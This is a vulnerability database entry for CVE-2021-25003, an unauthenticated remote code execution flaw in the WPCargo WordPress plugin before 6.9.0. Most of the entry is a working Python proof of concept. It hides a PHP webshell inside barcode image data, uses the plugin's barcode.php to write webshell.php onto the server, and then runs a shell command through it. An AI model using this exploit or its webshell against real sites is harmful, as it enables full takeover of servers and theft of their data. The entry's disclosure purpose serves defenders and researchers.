Lucene search
Krzysztof ZającWPEX-ID:5C21AD35-B2FB-4A51-858F-8FFFF685DE4AHistoryFeb 21, 2022 - 12:00 a.m.
WPCargo < 6.9.0 - Unauthenticated RCE
2022-02-2100:00:00
Krzysztof Zając
266
0.612 Medium
EPSS
Percentile
97.8%
The plugin contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE
import sys
import binascii
import requests
# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'
def encode_character_code(c: int):
return '{:08b}'.format(c).replace('0', 'x')
text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
destination_url = 'http://127.0.0.1:8001/'
cmd = 'ls'
# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)
# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))
Related
githubexploit
githubexploit
patchstack
patchstack
attackerkb
attackerkb
CVE-2021-25003
2022-03-14 00:00:00
cvelist
cvelist
CVE-2021-25003 WPCargo < 6.9.0 - Unauthenticated RCE
2022-03-14 14:41:11
nvd
nvd
CVE-2021-25003
2022-03-14 15:15:08
wpvulndb
wpvulndb
WPCargo < 6.9.0 - Unauthenticated RCE
2022-02-21 00:00:00
prion
prion
Design/Logic Flaw
2022-03-14 15:15:00
nuclei
nuclei
WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution
2022-10-20 00:55:04
cve
cve
CVE-2021-25003
2022-03-14 15:15:08